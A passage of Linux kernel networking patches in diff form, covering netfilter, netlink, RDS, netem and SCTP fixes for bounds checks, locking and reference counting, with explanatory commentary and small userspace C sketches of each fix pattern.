+ 	case htons(ETH_P_8021Q):
++		if (!pskb_may_pull(skb, skb_mac_offset(skb) + sizeof(*veth)))
++			return false;
++
+ 		veth = (struct vlan_ethhdr *)skb_mac_header(skb);
+ 		if (veth->h_vlan_encapsulated_proto == proto) {
+ 			*offset += VLAN_HLEN;
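
Both flowtable hunks add the same guard: prove the packet actually contains
a complete VLAN ethernet header before the header is dereferenced. A hedged
userspace sketch of that validate-before-cast pattern, using a simplified
stand-in for struct vlan_ethhdr (all names here are illustrative):

#include <stdint.h>
#include <stdio.h>
#include <string.h>

struct vlan_hdr_sketch {		/* stand-in for struct vlan_ethhdr */
	uint8_t  dest[6], src[6];
	uint16_t tpid;			/* 0x8100 */
	uint16_t tci;
	uint16_t encap_proto;		/* inner EtherType */
};

static int read_encap_proto(const uint8_t *pkt, size_t len, uint16_t *proto)
{
	struct vlan_hdr_sketch hdr;

	if (len < sizeof(hdr))		/* the check the patch adds */
		return -1;
	memcpy(&hdr, pkt, sizeof(hdr));	/* copy avoids alignment traps */
	*proto = hdr.encap_proto;
	return 0;
}

int main(void)
{
	uint8_t runt[4] = {0};
	uint16_t proto;

	printf("runt frame: %s\n",
	       read_encap_proto(runt, sizeof(runt), &proto) ?
	       "rejected" : "accepted");
	return 0;
}
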
+diff --git a/net/netfilter/nf_flow_table_offload.c b/net/netfilter/nf_flow_table_offload.c
+index 1c26f03fc6617..1904a4f295d4a 100644
+--- a/net/netfilter/nf_flow_table_offload.c
++++ b/net/netfilter/nf_flow_table_offload.c
+@@ -841,8 +841,8 @@ static int nf_flow_offload_tuple(struct nf_flowtable *flowtable,
+ 				 struct list_head *block_cb_list)
+ {
+ 	struct flow_cls_offload cls_flow = {};
++	struct netlink_ext_ack extack = {};
+ 	struct flow_block_cb *block_cb;
+-	struct netlink_ext_ack extack;
+ 	__be16 proto = ETH_P_ALL;
+ 	int err, i = 0;
+ 
+diff --git a/net/netfilter/nf_tables_api.c b/net/netfilter/nf_tables_api.c
+index 10180d280e792..63b7be0a95d04 100644
+--- a/net/netfilter/nf_tables_api.c
++++ b/net/netfilter/nf_tables_api.c
+@@ -7416,28 +7416,26 @@ static void audit_log_obj_reset(const struct nft_table *table,
+ 	kfree(buf);
+ }
+ 
+-struct nft_obj_filter {
++struct nft_obj_dump_ctx {
++	unsigned int	s_idx;
+ 	char		*table;
+ 	u32		type;
++	bool		reset;
+ };
+ 
+ static int nf_tables_dump_obj(struct sk_buff *skb, struct netlink_callback *cb)
+ {
+ 	const struct nfgenmsg *nfmsg = nlmsg_data(cb->nlh);
+-	const struct nft_table *table;
+-	unsigned int idx = 0, s_idx = cb->args[0];
+-	struct nft_obj_filter *filter = cb->data;
++	struct nft_obj_dump_ctx *ctx = (void *)cb->ctx;
+ 	struct net *net = sock_net(skb->sk);
+ 	int family = nfmsg->nfgen_family;
+ 	struct nftables_pernet *nft_net;
++	const struct nft_table *table;
+ 	unsigned int entries = 0;
+ 	struct nft_object *obj;
+-	bool reset = false;
++	unsigned int idx = 0;
+ 	int rc = 0;
+ 
+-	if (NFNL_MSG_TYPE(cb->nlh->nlmsg_type) == NFT_MSG_GETOBJ_RESET)
+-		reset = true;
+-
+ 	rcu_read_lock();
+ 	nft_net = nft_pernet(net);
+ 	cb->seq = READ_ONCE(nft_net->base_seq);
+@@ -7450,17 +7448,12 @@ static int nf_tables_dump_obj(struct sk_buff *skb, struct netlink_callback *cb)
+ 		list_for_each_entry_rcu(obj, &table->objects, list) {
+ 			if (!nft_is_active(net, obj))
+ 				goto cont;
+-			if (idx < s_idx)
++			if (idx < ctx->s_idx)
+ 				goto cont;
+-			if (idx > s_idx)
+-				memset(&cb->args[1], 0,
+-				       sizeof(cb->args) - sizeof(cb->args[0]));
+-			if (filter && filter->table &&
+-			    strcmp(filter->table, table->name))
++			if (ctx->table && strcmp(ctx->table, table->name))
+ 				goto cont;
+-			if (filter &&
+-			    filter->type != NFT_OBJECT_UNSPEC &&
+-			    obj->ops->type->type != filter->type)
++			if (ctx->type != NFT_OBJECT_UNSPEC &&
++			    obj->ops->type->type != ctx->type)
+ 				goto cont;
+ 
+ 			rc = nf_tables_fill_obj_info(skb, net,
+@@ -7469,7 +7462,7 @@ static int nf_tables_dump_obj(struct sk_buff *skb, struct netlink_callback *cb)
+ 						     NFT_MSG_NEWOBJ,
+ 						     NLM_F_MULTI | NLM_F_APPEND,
+ 						     table->family, table,
+-						     obj, reset);
++						     obj, ctx->reset);
+ 			if (rc < 0)
+ 				break;
+ 
+@@ -7478,58 +7471,71 @@ static int nf_tables_dump_obj(struct sk_buff *skb, struct netlink_callback *cb)
+ cont:
+ 			idx++;
+ 		}
+-		if (reset && entries)
++		if (ctx->reset && entries)
+ 			audit_log_obj_reset(table, nft_net->base_seq, entries);
+ 		if (rc < 0)
+ 			break;
+ 	}
+ 	rcu_read_unlock();
+ 
+-	cb->args[0] = idx;
++	ctx->s_idx = idx;
+ 	return skb->len;
+ }
+ 
++static int nf_tables_dumpreset_obj(struct sk_buff *skb,
++				   struct netlink_callback *cb)
++{
++	struct nftables_pernet *nft_net = nft_pernet(sock_net(skb->sk));
++	int ret;
++
++	mutex_lock(&nft_net->commit_mutex);
++	ret = nf_tables_dump_obj(skb, cb);
++	mutex_unlock(&nft_net->commit_mutex);
++
++	return ret;
++}
++
+ static int nf_tables_dump_obj_start(struct netlink_callback *cb)
+ {
++	struct nft_obj_dump_ctx *ctx = (void *)cb->ctx;
+ 	const struct nlattr * const *nla = cb->data;
+-	struct nft_obj_filter *filter = NULL;
+-
+-	if (nla[NFTA_OBJ_TABLE] || nla[NFTA_OBJ_TYPE]) {
+-		filter = kzalloc(sizeof(*filter), GFP_ATOMIC);
+-		if (!filter)
+-			return -ENOMEM;
+ 
+-		if (nla[NFTA_OBJ_TABLE]) {
+-			filter->table = nla_strdup(nla[NFTA_OBJ_TABLE], GFP_ATOMIC);
+-			if (!filter->table) {
+-				kfree(filter);
+-				return -ENOMEM;
+-			}
+-		}
++	BUILD_BUG_ON(sizeof(*ctx) > sizeof(cb->ctx));
+ 
+-		if (nla[NFTA_OBJ_TYPE])
+-			filter->type = ntohl(nla_get_be32(nla[NFTA_OBJ_TYPE]));
++	if (nla[NFTA_OBJ_TABLE]) {
++		ctx->table = nla_strdup(nla[NFTA_OBJ_TABLE], GFP_ATOMIC);
++		if (!ctx->table)
++			return -ENOMEM;
+ 	}
+ 
+-	cb->data = filter;
++	if (nla[NFTA_OBJ_TYPE])
++		ctx->type = ntohl(nla_get_be32(nla[NFTA_OBJ_TYPE]));
++
+ 	return 0;
+ }
+ 
++static int nf_tables_dumpreset_obj_start(struct netlink_callback *cb)
++{
++	struct nft_obj_dump_ctx *ctx = (void *)cb->ctx;
++
++	ctx->reset = true;
++
++	return nf_tables_dump_obj_start(cb);
++}
++
+ static int nf_tables_dump_obj_done(struct netlink_callback *cb)
+ {
+-	struct nft_obj_filter *filter = cb->data;
++	struct nft_obj_dump_ctx *ctx = (void *)cb->ctx;
+ 
+-	if (filter) {
+-		kfree(filter->table);
+-		kfree(filter);
+-	}
++	kfree(ctx->table);
+ 
+ 	return 0;
+ }
+ 
+ /* called with rcu_read_lock held */
+-static int nf_tables_getobj(struct sk_buff *skb, const struct nfnl_info *info,
+-			    const struct nlattr * const nla[])
++static struct sk_buff *
++nf_tables_getobj_single(u32 portid, const struct nfnl_info *info,
++			const struct nlattr * const nla[], bool reset)
+ {
+ 	struct netlink_ext_ack *extack = info->extack;
+ 	u8 genmask = nft_genmask_cur(info->net);
+@@ -7538,72 +7544,109 @@ static int nf_tables_getobj(struct sk_buff *skb, const struct nfnl_info *info,
+ 	struct net *net = info->net;
+ 	struct nft_object *obj;
+ 	struct sk_buff *skb2;
+-	bool reset = false;
+ 	u32 objtype;
+ 	int err;
+ 
+-	if (info->nlh->nlmsg_flags & NLM_F_DUMP) {
+-		struct netlink_dump_control c = {
+-			.start = nf_tables_dump_obj_start,
+-			.dump = nf_tables_dump_obj,
+-			.done = nf_tables_dump_obj_done,
+-			.module = THIS_MODULE,
+-			.data = (void *)nla,
+-		};
+-
+-		return nft_netlink_dump_start_rcu(info->sk, skb, info->nlh, &c);
+-	}
+-
+ 	if (!nla[NFTA_OBJ_NAME] ||
+ 	    !nla[NFTA_OBJ_TYPE])
+-		return -EINVAL;
++		return ERR_PTR(-EINVAL);
+ 
+ 	table = nft_table_lookup(net, nla[NFTA_OBJ_TABLE], family, genmask, 0);
+ 	if (IS_ERR(table)) {
+ 		NL_SET_BAD_ATTR(extack, nla[NFTA_OBJ_TABLE]);
+-		return PTR_ERR(table);
++		return ERR_CAST(table);
+ 	}
+ 
+ 	objtype = ntohl(nla_get_be32(nla[NFTA_OBJ_TYPE]));
+ 	obj = nft_obj_lookup(net, table, nla[NFTA_OBJ_NAME], objtype, genmask);
+ 	if (IS_ERR(obj)) {
+ 		NL_SET_BAD_ATTR(extack, nla[NFTA_OBJ_NAME]);
+-		return PTR_ERR(obj);
++		return ERR_CAST(obj);
+ 	}
+ 
+ 	skb2 = alloc_skb(NLMSG_GOODSIZE, GFP_ATOMIC);
+ 	if (!skb2)
+-		return -ENOMEM;
++		return ERR_PTR(-ENOMEM);
+ 
+-	if (NFNL_MSG_TYPE(info->nlh->nlmsg_type) == NFT_MSG_GETOBJ_RESET)
+-		reset = true;
++	err = nf_tables_fill_obj_info(skb2, net, portid,
++				      info->nlh->nlmsg_seq, NFT_MSG_NEWOBJ, 0,
++				      family, table, obj, reset);
++	if (err < 0) {
++		kfree_skb(skb2);
++		return ERR_PTR(err);
++	}
+ 
+-	if (reset) {
+-		const struct nftables_pernet *nft_net;
+-		char *buf;
++	return skb2;
++}
+ 
+-		nft_net = nft_pernet(net);
+-		buf = kasprintf(GFP_ATOMIC, "%s:%u", table->name, nft_net->base_seq);
++static int nf_tables_getobj(struct sk_buff *skb, const struct nfnl_info *info,
++			    const struct nlattr * const nla[])
++{
++	u32 portid = NETLINK_CB(skb).portid;
++	struct sk_buff *skb2;
+ 
+-		audit_log_nfcfg(buf,
+-				family,
+-				1,
+-				AUDIT_NFT_OP_OBJ_RESET,
+-				GFP_ATOMIC);
+-		kfree(buf);
++	if (info->nlh->nlmsg_flags & NLM_F_DUMP) {
++		struct netlink_dump_control c = {
++			.start = nf_tables_dump_obj_start,
++			.dump = nf_tables_dump_obj,
++			.done = nf_tables_dump_obj_done,
++			.module = THIS_MODULE,
++			.data = (void *)nla,
++		};
++
++		return nft_netlink_dump_start_rcu(info->sk, skb, info->nlh, &c);
+ 	}
+ 
+-	err = nf_tables_fill_obj_info(skb2, net, NETLINK_CB(skb).portid,
+-				      info->nlh->nlmsg_seq, NFT_MSG_NEWOBJ, 0,
+-				      family, table, obj, reset);
+-	if (err < 0)
+-		goto err_fill_obj_info;
++	skb2 = nf_tables_getobj_single(portid, info, nla, false);
++	if (IS_ERR(skb2))
++		return PTR_ERR(skb2);
+ 
+-	return nfnetlink_unicast(skb2, net, NETLINK_CB(skb).portid);
++	return nfnetlink_unicast(skb2, info->net, portid);
++}
+ 
+-err_fill_obj_info:
+-	kfree_skb(skb2);
+-	return err;
++static int nf_tables_getobj_reset(struct sk_buff *skb,
++				  const struct nfnl_info *info,
++				  const struct nlattr * const nla[])
++{
++	struct nftables_pernet *nft_net = nft_pernet(info->net);
++	u32 portid = NETLINK_CB(skb).portid;
++	struct net *net = info->net;
++	struct sk_buff *skb2;
++	char *buf;
++
++	if (info->nlh->nlmsg_flags & NLM_F_DUMP) {
++		struct netlink_dump_control c = {
++			.start = nf_tables_dumpreset_obj_start,
++			.dump = nf_tables_dumpreset_obj,
++			.done = nf_tables_dump_obj_done,
++			.module = THIS_MODULE,
++			.data = (void *)nla,
++		};
++
++		return nft_netlink_dump_start_rcu(info->sk, skb, info->nlh, &c);
++	}
++
++	if (!try_module_get(THIS_MODULE))
++		return -EINVAL;
++	rcu_read_unlock();
++	mutex_lock(&nft_net->commit_mutex);
++	skb2 = nf_tables_getobj_single(portid, info, nla, true);
++	mutex_unlock(&nft_net->commit_mutex);
++	rcu_read_lock();
++	module_put(THIS_MODULE);
++
++	if (IS_ERR(skb2))
++		return PTR_ERR(skb2);
++
++	buf = kasprintf(GFP_ATOMIC, "%.*s:%u",
++			nla_len(nla[NFTA_OBJ_TABLE]),
++			(char *)nla_data(nla[NFTA_OBJ_TABLE]),
++			nft_net->base_seq);
++	audit_log_nfcfg(buf, info->nfmsg->nfgen_family, 1,
++			AUDIT_NFT_OP_OBJ_RESET, GFP_ATOMIC);
++	kfree(buf);
++
++	return nfnetlink_unicast(skb2, net, portid);
+ }
+ 
+ static void nft_obj_destroy(const struct nft_ctx *ctx, struct nft_object *obj)
+@@ -8810,7 +8853,7 @@ static const struct nfnl_callback nf_tables_cb[NFT_MSG_MAX] = {
+ 		.policy		= nft_obj_policy,
+ 	},
+ 	[NFT_MSG_GETOBJ_RESET] = {
+-		.call		= nf_tables_getobj,
++		.call		= nf_tables_getobj_reset,
+ 		.type		= NFNL_CB_RCU,
+ 		.attr_count	= NFTA_OBJ_MAX,
+ 		.policy		= nft_obj_policy,
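
The nf_tables rework above drops the heap-allocated filter and keeps the
dump state directly inside the netlink callback's scratch area, guarded by
BUILD_BUG_ON so the struct can never outgrow it. A userspace sketch of the
same idea, with _Static_assert standing in for BUILD_BUG_ON (all names are
illustrative):

#include <stdio.h>

#define SCRATCH_WORDS 6			/* mirrors netlink_callback's ctx[] */

struct callback_sketch {
	long ctx[SCRATCH_WORDS];	/* opaque scratch owned by the core */
};

struct dump_ctx {			/* state the dumper must persist */
	unsigned int s_idx;
	char *table;
	unsigned int type;
	int reset;
};

_Static_assert(sizeof(struct dump_ctx) <=
	       sizeof(((struct callback_sketch *)0)->ctx),
	       "dump_ctx must fit in the scratch area");

int main(void)
{
	struct callback_sketch cb = {0};
	struct dump_ctx *ctx = (void *)cb.ctx;	/* same cast as the patch */

	ctx->s_idx = 42;			/* survives between dump calls */
	printf("resume at index %u\n", ctx->s_idx);
	return 0;
}
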
+diff --git a/net/netfilter/nfnetlink_queue.c b/net/netfilter/nfnetlink_queue.c
+index 5bc342cb13767..f13eed826cbb8 100644
+--- a/net/netfilter/nfnetlink_queue.c
++++ b/net/netfilter/nfnetlink_queue.c
+@@ -647,10 +647,41 @@ static bool nf_ct_drop_unconfirmed(const struct nf_queue_entry *entry)
+ {
+ #if IS_ENABLED(CONFIG_NF_CONNTRACK)
+ 	static const unsigned long flags = IPS_CONFIRMED | IPS_DYING;
+-	const struct nf_conn *ct = (void *)skb_nfct(entry->skb);
++	struct nf_conn *ct = (void *)skb_nfct(entry->skb);
++	unsigned long status;
++	unsigned int use;
+ 
+-	if (ct && ((ct->status & flags) == IPS_DYING))
++	if (!ct)
++		return false;
++
++	status = READ_ONCE(ct->status);
++	if ((status & flags) == IPS_DYING)
+ 		return true;
++
++	if (status & IPS_CONFIRMED)
++		return false;
++
++	/* in some cases skb_clone() can occur after initial conntrack
++	 * pickup, but conntrack assumes exclusive skb->_nfct ownership for
++	 * unconfirmed entries.
++	 *
++	 * This happens for br_netfilter and with ip multicast routing.
++	 * This can't be solved with serialization here because one clone could
++	 * have been queued for local delivery.
++	 */
++	use = refcount_read(&ct->ct_general.use);
++	if (likely(use == 1))
++		return false;
++
++	/* Can't decrement further? Exclusive ownership. */
++	if (!refcount_dec_not_one(&ct->ct_general.use))
++		return false;
++
++	skb_set_nfct(entry->skb, 0);
++	/* No nf_ct_put(): we already decremented .use and it cannot
++	 * drop down to 0.
++	 */
++	return true;
+ #endif
+ 	return false;
+ }
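
The queue hunk detaches conntrack from a cloned skb only when it can prove
it is not the last reference holder, via refcount_dec_not_one(): decrement
unless the count is exactly 1. A userspace sketch of that primitive with
C11 atomics (dec_not_one() is an illustrative reimplementation, not the
kernel helper; the count is assumed to start at 1 or more):

#include <stdatomic.h>
#include <stdbool.h>
#include <stdio.h>

static bool dec_not_one(atomic_uint *ref)
{
	unsigned int old = atomic_load(ref);

	while (old != 1) {		/* 1 means exclusive owner: refuse */
		if (atomic_compare_exchange_weak(ref, &old, old - 1))
			return true;	/* shared: dropped one reference */
	}
	return false;
}

int main(void)
{
	atomic_uint shared = 3, exclusive = 1;

	printf("shared:    %s\n", dec_not_one(&shared) ? "detached" : "kept");
	printf("exclusive: %s\n", dec_not_one(&exclusive) ? "detached" : "kept");
	return 0;
}
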
+diff --git a/net/netfilter/nft_counter.c b/net/netfilter/nft_counter.c
+index b5fe7fe4b60db..781d3a26f5df7 100644
+--- a/net/netfilter/nft_counter.c
++++ b/net/netfilter/nft_counter.c
+@@ -107,11 +107,16 @@ static void nft_counter_reset(struct nft_counter_percpu_priv *priv,
+ 			      struct nft_counter *total)
+ {
+ 	struct nft_counter *this_cpu;
++	seqcount_t *myseq;
+ 
+ 	local_bh_disable();
+ 	this_cpu = this_cpu_ptr(priv->counter);
++	myseq = this_cpu_ptr(&nft_counter_seq);
++
++	write_seqcount_begin(myseq);
+ 	this_cpu->packets -= total->packets;
+ 	this_cpu->bytes -= total->bytes;
++	write_seqcount_end(myseq);
+ 	local_bh_enable();
+ }
+ 
+@@ -264,7 +269,7 @@ static void nft_counter_offload_stats(struct nft_expr *expr,
+ 	struct nft_counter *this_cpu;
+ 	seqcount_t *myseq;
+ 
+-	preempt_disable();
++	local_bh_disable();
+ 	this_cpu = this_cpu_ptr(priv->counter);
+ 	myseq = this_cpu_ptr(&nft_counter_seq);
+ 
+@@ -272,7 +277,7 @@ static void nft_counter_offload_stats(struct nft_expr *expr,
+ 	this_cpu->packets += stats->pkts;
+ 	this_cpu->bytes += stats->bytes;
+ 	write_seqcount_end(myseq);
+-	preempt_enable();
++	local_bh_enable();
+ }
+ 
+ void nft_counter_init_seqcount(void)
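
Both counter hunks make every writer run inside a seqcount write section
(and inside a BH-disabled region rather than a merely preemption-disabled
one). The seqcount matters because 64-bit counters can tear on 32-bit
hosts, so readers must retry when the sequence moved under them. A
single-writer userspace sketch of the protocol (illustrative, not the
kernel's seqcount_t):

#include <stdatomic.h>
#include <stdio.h>

static atomic_uint seq;
static unsigned long packets, bytes;

static void write_counters(unsigned long p, unsigned long b)
{
	atomic_fetch_add(&seq, 1);	/* odd: write in progress */
	packets += p;
	bytes += b;
	atomic_fetch_add(&seq, 1);	/* even: write complete */
}

static void read_counters(unsigned long *p, unsigned long *b)
{
	unsigned int s;

	do {
		while ((s = atomic_load(&seq)) & 1)
			;		/* writer active: wait */
		*p = packets;
		*b = bytes;
	} while (atomic_load(&seq) != s);	/* retry if a write raced */
}

int main(void)
{
	unsigned long p, b;

	write_counters(10, 1500);
	read_counters(&p, &b);
	printf("packets=%lu bytes=%lu\n", p, b);
	return 0;
}
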
+diff --git a/net/netlink/af_netlink.c b/net/netlink/af_netlink.c
+index e9b81cba1e2b4..8d26bd2ae3d55 100644
+--- a/net/netlink/af_netlink.c
++++ b/net/netlink/af_netlink.c
+@@ -130,7 +130,7 @@ static const char *const nlk_cb_mutex_key_strings[MAX_LINKS + 1] = {
+ 	"nlk_cb_mutex-MAX_LINKS"
+ };
+ 
+-static int netlink_dump(struct sock *sk);
++static int netlink_dump(struct sock *sk, bool lock_taken);
+ 
+ /* nl_table locking explained:
+  * Lookup and traversal are protected with an RCU read-side lock. Insertion
+@@ -1953,7 +1953,7 @@ static int netlink_recvmsg(struct socket *sock, struct msghdr *msg, size_t len,
+ 
+ 	if (READ_ONCE(nlk->cb_running) &&
+ 	    atomic_read(&sk->sk_rmem_alloc) <= sk->sk_rcvbuf / 2) {
+-		ret = netlink_dump(sk);
++		ret = netlink_dump(sk, false);
+ 		if (ret) {
+ 			WRITE_ONCE(sk->sk_err, -ret);
+ 			sk_error_report(sk);
+@@ -2163,7 +2163,7 @@ static int netlink_dump_done(struct netlink_sock *nlk, struct sk_buff *skb,
+ 	return 0;
+ }
+ 
+-static int netlink_dump(struct sock *sk)
++static int netlink_dump(struct sock *sk, bool lock_taken)
+ {
+ 	struct netlink_sock *nlk = nlk_sk(sk);
+ 	struct netlink_ext_ack extack = {};
+@@ -2175,7 +2175,8 @@ static int netlink_dump(struct sock *sk)
+ 	int alloc_min_size;
+ 	int alloc_size;
+ 
+-	mutex_lock(nlk->cb_mutex);
++	if (!lock_taken)
++		mutex_lock(nlk->cb_mutex);
+ 	if (!nlk->cb_running) {
+ 		err = -EINVAL;
+ 		goto errout_skb;
+@@ -2330,9 +2331,7 @@ int __netlink_dump_start(struct sock *ssk, struct sk_buff *skb,
+ 	WRITE_ONCE(nlk->cb_running, true);
+ 	nlk->dump_done_errno = INT_MAX;
+ 
+-	mutex_unlock(nlk->cb_mutex);
+-
+-	ret = netlink_dump(sk);
++	ret = netlink_dump(sk, true);
+ 
+ 	sock_put(sk);
+ 
+diff --git a/net/rds/recv.c b/net/rds/recv.c
+index 5b426dc3634d1..a316180d3c32e 100644
+--- a/net/rds/recv.c
++++ b/net/rds/recv.c
+@@ -424,6 +424,7 @@ static int rds_still_queued(struct rds_sock *rs, struct rds_incoming *inc,
+ 	struct sock *sk = rds_rs_to_sk(rs);
+ 	int ret = 0;
+ 	unsigned long flags;
++	struct rds_incoming *to_drop = NULL;
+ 
+ 	write_lock_irqsave(&rs->rs_recv_lock, flags);
+ 	if (!list_empty(&inc->i_item)) {
+@@ -434,11 +435,14 @@ static int rds_still_queued(struct rds_sock *rs, struct rds_incoming *inc,
+ 					      -be32_to_cpu(inc->i_hdr.h_len),
+ 					      inc->i_hdr.h_dport);
+ 			list_del_init(&inc->i_item);
+-			rds_inc_put(inc);
++			to_drop = inc;
+ 		}
+ 	}
+ 	write_unlock_irqrestore(&rs->rs_recv_lock, flags);
+ 
++	if (to_drop)
++		rds_inc_put(to_drop);
++
+ 	rdsdebug("inc %p rs %p still %d dropped %d\n", inc, rs, ret, drop);
+ 	return ret;
+ }
+@@ -757,16 +761,21 @@ void rds_clear_recv_queue(struct rds_sock *rs)
+ 	struct sock *sk = rds_rs_to_sk(rs);
+ 	struct rds_incoming *inc, *tmp;
+ 	unsigned long flags;
++	LIST_HEAD(to_drop);
+ 
+ 	write_lock_irqsave(&rs->rs_recv_lock, flags);
+ 	list_for_each_entry_safe(inc, tmp, &rs->rs_recv_queue, i_item) {
+ 		rds_recv_rcvbuf_delta(rs, sk, inc->i_conn->c_lcong,
+ 				      -be32_to_cpu(inc->i_hdr.h_len),
+ 				      inc->i_hdr.h_dport);
++		list_move(&inc->i_item, &to_drop);
++	}
++	write_unlock_irqrestore(&rs->rs_recv_lock, flags);
++
++	list_for_each_entry_safe(inc, tmp, &to_drop, i_item) {
+ 		list_del_init(&inc->i_item);
+ 		rds_inc_put(inc);
+ 	}
+-	write_unlock_irqrestore(&rs->rs_recv_lock, flags);
+ }
+ 
+ /*
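
The RDS hunks shrink the rs_recv_lock critical sections: entries are only
unlinked (onto a private pointer or list) while the lock is held, and the
puts that may free them happen after it is dropped. A userspace sketch of
that detach-then-free pattern (types and names are illustrative):

#include <pthread.h>
#include <stdio.h>
#include <stdlib.h>

struct inc { struct inc *next; int id; };

static pthread_mutex_t lock = PTHREAD_MUTEX_INITIALIZER;
static struct inc *queue;

static void clear_queue(void)
{
	struct inc *to_drop, *n;

	pthread_mutex_lock(&lock);
	to_drop = queue;		/* detach everything under the lock */
	queue = NULL;
	pthread_mutex_unlock(&lock);

	for (; to_drop; to_drop = n) {	/* free with the lock dropped */
		n = to_drop->next;
		printf("dropping inc %d\n", to_drop->id);
		free(to_drop);
	}
}

int main(void)
{
	for (int i = 0; i < 3; i++) {
		struct inc *e = malloc(sizeof(*e));

		e->id = i;
		e->next = queue;
		queue = e;
	}
	clear_queue();
	return 0;
}
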
+diff --git a/net/sched/sch_generic.c b/net/sched/sch_generic.c
+index 7053c0292c335..6ab9359c1706f 100644
+--- a/net/sched/sch_generic.c
++++ b/net/sched/sch_generic.c
+@@ -502,7 +502,7 @@ static void dev_watchdog(struct timer_list *t)
+ 		if (netif_device_present(dev) &&
+ 		    netif_running(dev) &&
+ 		    netif_carrier_ok(dev)) {
+-			int some_queue_timedout = 0;
++			unsigned int timedout_ms = 0;
+ 			unsigned int i;
+ 			unsigned long trans_start;
+ 
+@@ -514,16 +514,17 @@ static void dev_watchdog(struct timer_list *t)
+ 				if (netif_xmit_stopped(txq) &&
+ 				    time_after(jiffies, (trans_start +
+ 							 dev->watchdog_timeo))) {
+-					some_queue_timedout = 1;
++					timedout_ms = jiffies_to_msecs(jiffies - trans_start);
+ 					atomic_long_inc(&txq->trans_timeout);
+ 					break;
+ 				}
+ 			}
+ 
+-			if (unlikely(some_queue_timedout)) {
++			if (unlikely(timedout_ms)) {
+ 				trace_net_dev_xmit_timeout(dev, i);
+-				WARN_ONCE(1, KERN_INFO "NETDEV WATCHDOG: %s (%s): transmit queue %u timed out\n",
+-				       dev->name, netdev_drivername(dev), i);
++				netdev_crit(dev, "NETDEV WATCHDOG: CPU: %d: transmit queue %u timed out %u ms\n",
++					    raw_smp_processor_id(),
++					    i, timedout_ms);
+ 				netif_freeze_queues(dev);
+ 				dev->netdev_ops->ndo_tx_timeout(dev, i);
+ 				netif_unfreeze_queues(dev);
+diff --git a/net/sched/sch_netem.c b/net/sched/sch_netem.c
+index d0e045116d4e9..a18b24c125f4e 100644
+--- a/net/sched/sch_netem.c
++++ b/net/sched/sch_netem.c
+@@ -437,12 +437,10 @@ static int netem_enqueue(struct sk_buff *skb, struct Qdisc *sch,
+ 	struct netem_sched_data *q = qdisc_priv(sch);
+ 	/* We don't fill cb now as skb_unshare() may invalidate it */
+ 	struct netem_skb_cb *cb;
+-	struct sk_buff *skb2;
++	struct sk_buff *skb2 = NULL;
+ 	struct sk_buff *segs = NULL;
+ 	unsigned int prev_len = qdisc_pkt_len(skb);
+ 	int count = 1;
+-	int rc = NET_XMIT_SUCCESS;
+-	int rc_drop = NET_XMIT_DROP;
+ 
+ 	/* Do not fool qdisc_drop_all() */
+ 	skb->prev = NULL;
+@@ -471,19 +469,11 @@ static int netem_enqueue(struct sk_buff *skb, struct Qdisc *sch,
+ 		skb_orphan_partial(skb);
+ 
+ 	/*
+-	 * If we need to duplicate packet, then re-insert at top of the
+-	 * qdisc tree, since parent queuer expects that only one
+-	 * skb will be queued.
++	 * If we need to duplicate packet, then clone it before
++	 * original is modified.
+ 	 */
+-	if (count > 1 && (skb2 = skb_clone(skb, GFP_ATOMIC)) != NULL) {
+-		struct Qdisc *rootq = qdisc_root_bh(sch);
+-		u32 dupsave = q->duplicate; /* prevent duplicating a dup... */
+-
+-		q->duplicate = 0;
+-		rootq->enqueue(skb2, rootq, to_free);
+-		q->duplicate = dupsave;
+-		rc_drop = NET_XMIT_SUCCESS;
+-	}
++	if (count > 1)
++		skb2 = skb_clone(skb, GFP_ATOMIC);
+ 
+ 	/*
+ 	 * Randomized packet corruption.
+@@ -495,7 +485,8 @@ static int netem_enqueue(struct sk_buff *skb, struct Qdisc *sch,
+ 		if (skb_is_gso(skb)) {
+ 			skb = netem_segment(skb, sch, to_free);
+ 			if (!skb)
+-				return rc_drop;
++				goto finish_segs;
++
+ 			segs = skb->next;
+ 			skb_mark_not_on_list(skb);
+ 			qdisc_skb_cb(skb)->pkt_len = skb->len;
+@@ -521,7 +512,24 @@ static int netem_enqueue(struct sk_buff *skb, struct Qdisc *sch,
+ 		/* re-link segs, so that qdisc_drop_all() frees them all */
+ 		skb->next = segs;
+ 		qdisc_drop_all(skb, sch, to_free);
+-		return rc_drop;
++		if (skb2)
++			__qdisc_drop(skb2, to_free);
++		return NET_XMIT_DROP;
++	}
++
++	/*
++	 * If doing duplication then re-insert at top of the
++	 * qdisc tree, since parent queuer expects that only one
++	 * skb will be queued.
++	 */
++	if (skb2) {
++		struct Qdisc *rootq = qdisc_root_bh(sch);
++		u32 dupsave = q->duplicate; /* prevent duplicating a dup... */
++
++		q->duplicate = 0;
++		rootq->enqueue(skb2, rootq, to_free);
++		q->duplicate = dupsave;
++		skb2 = NULL;
+ 	}
+ 
+ 	qdisc_qstats_backlog_inc(sch, skb);
+@@ -592,9 +600,12 @@ static int netem_enqueue(struct sk_buff *skb, struct Qdisc *sch,
+ 	}
+ 
+ finish_segs:
++	if (skb2)
++		__qdisc_drop(skb2, to_free);
++
+ 	if (segs) {
+ 		unsigned int len, last_len;
+-		int nb;
++		int rc, nb;
+ 
+ 		len = skb ? skb->len : 0;
+ 		nb = skb ? 1 : 0;
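
The netem rework changes the ordering: the duplicate is now cloned before
the original skb can be modified (segmented, corrupted), and is enqueued at
the root qdisc only once the original has been accepted; every error path
frees the pending clone. A toy userspace illustration of why the clone has
to be taken first (purely illustrative):

#include <stdio.h>
#include <stdlib.h>
#include <string.h>

int main(void)
{
	char *skb = strdup("original payload");
	char *skb2 = NULL;
	int duplicate = 1;

	if (duplicate)
		skb2 = strdup(skb);	/* clone first... */

	skb[0] = 'X';			/* ...then the original may be mangled */

	printf("queued:    %s\n", skb);
	if (skb2)
		printf("duplicate: %s\n", skb2);	/* still pristine */

	free(skb);
	free(skb2);
	return 0;
}
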
+diff --git a/net/sctp/inqueue.c b/net/sctp/inqueue.c
+index 7182c5a450fb5..5c16521818058 100644
+--- a/net/sctp/inqueue.c
++++ b/net/sctp/inqueue.c
+@@ -38,6 +38,14 @@ void sctp_inq_init(struct sctp_inq *queue)
+ 	INIT_WORK(&queue->immediate, NULL);
+ }
+ 
++/* Properly release the chunk which is being worked on. */
++static inline void sctp_inq_chunk_free(struct sctp_chunk *chunk)
++{
++	if (chunk->head_skb)
++		chunk->skb = chunk->head_skb;
++	sctp_chunk_free(chunk);
++}
++
+ /* Release the memory associated with an SCTP inqueue.  */
+ void sctp_inq_free(struct sctp_inq *queue)
+ {
+@@ -53,7 +61,7 @@ void sctp_inq_free(struct sctp_inq *queue)
+ 	 * free it as well.
